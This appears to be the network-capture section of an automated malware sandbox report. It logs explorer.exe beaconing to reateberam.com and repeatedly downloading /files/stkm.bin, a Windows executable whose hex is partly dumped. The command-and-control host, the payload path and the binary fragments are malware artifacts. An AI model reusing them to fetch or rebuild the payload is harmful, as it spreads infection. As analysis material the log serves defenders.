                                                                  2024-12-02 17:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.549928172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:44:52 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hldViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:44:53 UTC796INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uedJheL%2BVrqoYnddSjiyKtcHLYojYh%2F1KuiGOR%2FiANMSnL%2FrkYhgp7Q1Dq8sO%2BRm9W6qGheMxlpeBgSAlIQNLUpS35OCR%2Bb5AUszhkATENblhqklbwAWw1cO373DdYeogg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20a0ce898c84-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1850&rtt_var=701&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=1551540&cwnd=175&unsent_bytes=0&cid=52ba0c83c9f5e303&ts=753&x=0"
                                                                  2024-12-02 17:44:53 UTC431INData Raw: 31 61 38 0d 0a 50 53 6d 55 54 4d 4f 31 33 59 70 76 59 52 6e 61 6a 47 48 6f 67 33 52 47 4d 6b 33 52 42 53 4c 43 61 50 6d 33 76 79 4c 45 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 4a 30 45 6a 66 4a 66 6f 37 46 30 6e 44 37 75 32 74 71 4a 47 74 5a 47 76 70 4d 73 35 37 55 35 57 47 32 42 45 35 38 43 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 41 32 41 75 6a 6e 4a 42 68 2b 61 62 37 44 66 6e 6b 75 34 4d 74 46 37 46 58 63 41 42 35 4f 37 45 30 34 4d 56 4d 4f 4e 6f 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 52 52 70
                                                                  Data Ascii: 1a8PSmUTMO13YpvYRnajGHog3RGMk3RBSLCaPm3vyLEYmmcphSGpB6yiJiVjA1pJ0EjfJfo7F0nD7u2tqJGtZGvpMs57U5WG2BE58CjfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcA2AujnJBh+ab7Dfnku4MtF7FXcAB5O7E04MVMONozMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1RRp
                                                                  2024-12-02 17:44:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.549934172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:44:55 UTC127OUTGET /files/stkm.bin HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  2024-12-02 17:44:56 UTC948INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:56 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 857600
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename = stkm.bin
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 224
                                                                  Last-Modified: Mon, 02 Dec 2024 17:41:12 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gON8IKGktM4rZ7sLDmTqQ8KdB4z%2F01%2FRpyeE%2BXLqDylShs1uPUp7FiQV9fA%2BAUa5ujUc8PYaEbTIAOMtu09bEmOerymq31tJTBY%2FFrOwhDOwPlUdC3XqNT9eer08dSQNzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20b62d038cb3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=1897&rtt_var=835&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=765&delivery_rate=1539272&cwnd=219&unsent_bytes=0&cid=b8eba4bc3697e437&ts=1813&x=0"
                                                                  2024-12-02 17:44:56 UTC421INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                  Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                  2024-12-02 17:44:56 UTC1369INData Raw: 01 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00
                                                                  Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
                                                                  2024-12-02 17:44:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  2024-12-02 17:44:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  2024-12-02 17:44:56 UTC1369INData Raw: 24 20 74 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48
                                                                  Data Ascii: $ tf9LT uHL$ 3H8H\$H|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.549941172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:44:59 UTC151OUTGET /files/stkm.bin HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Connection: Keep-Alive
                                                                  2024-12-02 17:44:59 UTC954INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:59 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 857600
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename = stkm.bin
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 227
                                                                  Last-Modified: Mon, 02 Dec 2024 17:41:12 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E06d5Hvls%2BlI4GGMQ8661AXvEK%2FQ59XiOx0UdigqO9qMYZLA%2F4lmAKRLeJk51bL4Bq6zrRZ%2F9GXkKd6P%2Bst5H95Z0enLQTMnTyWQBEX6NFTFLaFLx%2F%2F9%2BRMtaHTWm3Ltzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20ca8d32de9b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1645&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=765&delivery_rate=1723730&cwnd=176&unsent_bytes=0&cid=837781f43966d4a3&ts=1835&x=0"
                                                                  2024-12-02 17:44:59 UTC415INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                  Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                  2024-12-02 17:44:59 UTC1369INData Raw: 00 00 e0 0c 00 e0 01 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10
                                                                  Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
                                                                  2024-12-02 17:44:59 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.549950172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:02 UTC127OUTGET /files/stkm.bin HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  2024-12-02 17:45:02 UTC953INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:02 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 857600
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename = stkm.bin
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 225
                                                                  Last-Modified: Mon, 02 Dec 2024 17:41:17 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EOlxqxUJpROZ5%2BZCP7WeyhkUkw9rK8PrPrAREA%2Bah%2Bdr%2B7vWaVfm2%2BX6xIMXZ0uMKxe5nvJJ3Zb6Q7CAY%2BQPQEuDoOHjDh3H%2BtkgdsBdAgCTDRm3jmIsRqr6ddkNrVwOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20dd2d93a21a-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14171&min_rtt=14161&rtt_var=5318&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=765&delivery_rate=206200&cwnd=32&unsent_bytes=0&cid=6ad9a6dc765e8e77&ts=1708&x=0"
                                                                  2024-12-02 17:45:02 UTC416INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                  Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 00 e0 0c 00 e0 01 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c
                                                                  Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 8b d1 66 39 4c 24 20 74 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85
                                                                  Data Ascii: f9L$ tf9LT uHL$ 3H8H\$H|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FH
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 41 54 41 55 41 56 41 57 48 8d a8 48 fe ff ff 48 81 ec 90 02 00 00 48 8d 05 5f 45 0c 00 c7 44 24 20 3b 64 d2 03 48 89 44 24 28 48 8d 74 24 28 48 8d 05 4e 45 0c 00 c7 44 24 30 7f 27 64 e7 45 33 e4 48 89 44 24 38 45 8b f4 4c 8d 2d f4 bf 0a 00 e8 23 fa ff ff e8 1e fa ff ff 48 89 85 c0 01 00 00 48 85 c0 0f 84 e5 00 00 00 41 8b fc ff c7 66 45 39 64 7d 00 75 f6 41 8b dc 66 44 39 20 74 09 ff c3 66 44 39 24 58 75 f7 8d 14 3b 8d 14 55 02 00 00 00 48 8d 8d c0 01 00 00 e8 1d 0d 00 00 85 c0 0f 84 a8 00 00 00 4c 8b bd c0 01 00 00 8b c3 49 8d 0c 47 03 ff 74 17 49 8b d5 44 8b c7 48 2b d1 8a 04 0a 88 01 48 ff c1 49 83 e8 01 75 f2 33 d2 48 8d 4c 24 40 41 b8 50 02 00 00 49 8b dc e8 c8 59 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b
                                                                  Data Ascii: ATAUAVAWHHHH_ED$ ;dHD$(Ht$(HNED$0'dE3HD$8EL-#HHAfE9d}uAfD9 tfD9$Xu;UHLIGtIDH+HIu3HL$@APIYHT$@IJDHHtJ&A
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 95 c8 01 00 00 c7 85 d8 01 00 00 1b c3 53 2b 48 89 95 e0 01 00 00 c7 85 f0 01 00 00 f2 cb 55 df 48 89 95 f8 01 00 00 c7 85 08 02 00 00 4a 47 2d d5 48 89 95 10 02 00 00 c7 85 20 02 00 00 57 12 a2 8a 48 89 95 28 02 00 00 c7 85 38 02 00 00 39 1e f1 72 48 89 95 40 02 00 00 c7 85 50 02 00 00 21 d0 52 45 48 89 95 58 02 00 00 c7 85 68 02 00 00 7a 8e 25 e9 48 89 95 70 02 00 00 c7 85 80 02 00 00 a4 1a 86 d0 48 89 95 88 02 00 00 c7 85 98 02 00 00 14 31 8b 23 48 89 95 a0 02 00 00 c7 85 b0 02 00 00 07 77 19 f5 48 89 95 b8 02 00 00 c7 85 c8 02 00 00 4d 11 46 05 48 89 95 d0 02 00 00 c7 85 e0 02 00 00 02 91 78 2d 48 8d 05 d2 3d 0c 00 48 89 95 e8 02 00 00 48 89 85 f0 02 00 00 48 8d 0d 2d 3f 0c 00 48 8d 05 ae 3d 0c 00 c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48
                                                                  Data Ascii: S+HUHJG-H WH(89rH@P!REHXhz%HpH1#HwHMFHx-H=HHH-?H='HH
